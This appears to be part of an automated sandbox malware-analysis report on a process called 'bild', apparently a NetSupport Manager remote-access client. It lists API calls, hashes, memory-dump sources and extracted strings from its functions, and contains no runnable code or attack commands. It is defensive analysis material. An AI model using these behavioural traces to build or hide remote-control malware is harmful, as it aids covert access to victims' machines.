                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3768737497-0
                                                                                      • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                      • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_
                                                                                      • String ID:
                                                                                      • API String ID: 3382485803-0
                                                                                      • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                      • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                      APIs
                                                                                      • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                      • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                      APIs
                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationToken
                                                                                      • String ID:
                                                                                      • API String ID: 4114910276-0
                                                                                      • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                      • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 328603210-0
                                                                                      • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                      • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,6C5F6F16,00000000,?,6C5FD40B,00000001,6C5F6F16,00000000,00000000,00000000,?,6C5F6F16,00000001,00000214), ref: 6C5FA0C5
                                                                                        • Part of subcall function 6C5F60F9: __getptd_noexit.LIBCMT ref: 6C5F60F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 328603210-0
                                                                                      • Opcode ID: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
                                                                                      • Instruction ID: 007abf6902efb8a09d600b6b51ba5231d223184a43b03df5e63c19687b988cdf
                                                                                      • Opcode Fuzzy Hash: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
                                                                                      • Instruction Fuzzy Hash: 4B01D8313062119FFB1D9E26DC54B57376CEF81369F114629E835C7990DB75D802CE52
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __waccess_s
                                                                                      • String ID:
                                                                                      • API String ID: 4272103461-0
                                                                                      • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                      • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3646066109-0
                                                                                      • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                      • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                      APIs
                                                                                      • _NSMClient32@8.PCICL32(?,?,?,004B10A2,00000000), ref: 004B100B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4161045215.00000000004B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004B0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4160974107.00000000004B0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_4b0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Client32@8
                                                                                      • String ID:
                                                                                      • API String ID: 433899448-0
                                                                                      • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction ID: a6e21a181334ad8d68c0d1b68244e85e5dbeb702fee524da2babc4fc0ac728fe
                                                                                      • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction Fuzzy Hash: 3EB092B212434D9B8714EE99E851CBB33DCAA98600B40080ABD0543682CA65FC60A675
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                      • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                        • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                        • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                        • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                        • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                      • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                      • SetEvent.KERNEL32(00000250), ref: 1102D3E7
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                      • PostThreadMessageA.USER32(00001E6C,00000000,00000000,00000000), ref: 1102D5BC
                                                                                      • CloseHandle.KERNEL32(00000294), ref: 1102D815
                                                                                      • _free.LIBCMT ref: 1102D825
                                                                                      • _free.LIBCMT ref: 1102D841
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                      • _memset.LIBCMT ref: 1102D983
                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                      • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                      • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                      • String ID: *.*$051829$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                      • API String ID: 2369127096-616690651
                                                                                      • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                      • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                      • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                      • _sprintf.LIBCMT ref: 1103B2BB
                                                                                      • _fputs.LIBCMT ref: 1103B330
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                      • _free.LIBCMT ref: 1103B336
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                      • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 383231468-3762817415
                                                                                      • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                      • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                      • API String ID: 0-293745777
                                                                                      • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                      • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                      • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                        • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                        • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                        • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
